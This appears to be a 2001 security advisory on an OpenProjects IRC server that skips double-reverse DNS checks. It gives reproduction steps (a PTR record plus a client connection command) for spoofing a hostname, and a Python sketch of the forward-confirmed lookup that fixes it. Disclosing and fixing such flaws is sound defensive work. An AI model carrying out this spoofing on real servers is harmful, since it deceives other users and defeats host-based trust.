OpenProjects.net's ircd suffers from a security vulnerability because it does not perform a proper double-reverse DNS lookup. This allows attackers to spoof any hostname that actually exists on the internet.

Credit:
The information has been provided by Jukka Mutex, chrisj at newgold.net and Joseph Mallett.
Vulnerable systems:
OpenProjects u2.10.05.18.(ipcheck4-5)
Recreate:
1. Choose a hostname to spoof. Keep in mind that you must choose a hostname that actually exists; for our example we will use 'host.example.com'.
2. Point your reverse lookup to the hostname. For our example, we will put the following in our BIND zone file:
   1.2.3.4.in-addr.arpa. IN PTR host.example.com.
   This assumes you are using the same IP I used, 1.2.3.4.
3. Connect to a vulnerable IRC server:
   BitchX -H 1.2.3.4 jmutex asimov.openprojects.net
Try a WHOIS on yourself.
/whois jmutex
jmutex (jmutex@ host.example.com)
ircname : Jukka Mutex
server : asimov.openprojects.net (Fremont, CA)
idle : 0 hours 0 mins 24 secs (signon: Tue Oct 9 05:32:16 2001)
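
The missing check is a forward-confirmed (double-reverse) lookup: resolve the PTR name back to addresses and show it only if the connecting IP is among them. The sketch below is an added example, not code from the ircd; the function names and every record other than the page's 1.2.3.4 / host.example.com pair are constructed for illustration.

```python
import ipaddress
import socket


def system_reverse(ip):
    """PTR lookup via the system resolver; returns a hostname or None."""
    try:
        return socket.gethostbyaddr(ip)[0]
    except OSError:  # covers socket.herror and socket.gaierror
        return None


def system_forward(hostname):
    """A/AAAA lookup via the system resolver; returns address strings."""
    try:
        return [info[4][0] for info in socket.getaddrinfo(hostname, None)]
    except OSError:
        return []


def verified_hostname(ip, reverse=system_reverse, forward=system_forward):
    """Return the PTR name only if it resolves back to ip, else the bare IP."""
    peer = ipaddress.ip_address(ip)
    name = reverse(ip)
    if not name:
        return ip
    name = name.rstrip(".")
    for addr in forward(name):
        try:
            if ipaddress.ip_address(addr) == peer:
                return name
        except ValueError:
            continue  # ignore malformed resolver output
    return ip  # PTR is unconfirmed: do not display the claimed hostname


# Constructed records modelling the page's scenario (not real DNS data).
PTR = {"1.2.3.4": "host.example.com.", "192.0.2.10": "irc-user.example.net."}
A = {"host.example.com": ["192.0.2.77"], "irc-user.example.net": ["192.0.2.10"]}


def demo(ip):
    """Run the check against the constructed records above (offline)."""
    return verified_hostname(ip, PTR.get, lambda h: A.get(h, []))


if __name__ == "__main__":
    for ip in ("1.2.3.4", "192.0.2.10", "192.0.2.99"):
        print(ip, "->", demo(ip))
```

With this check in place, the client from the steps above would appear as jmutex@1.2.3.4, because the address records for host.example.com do not include the connecting IP.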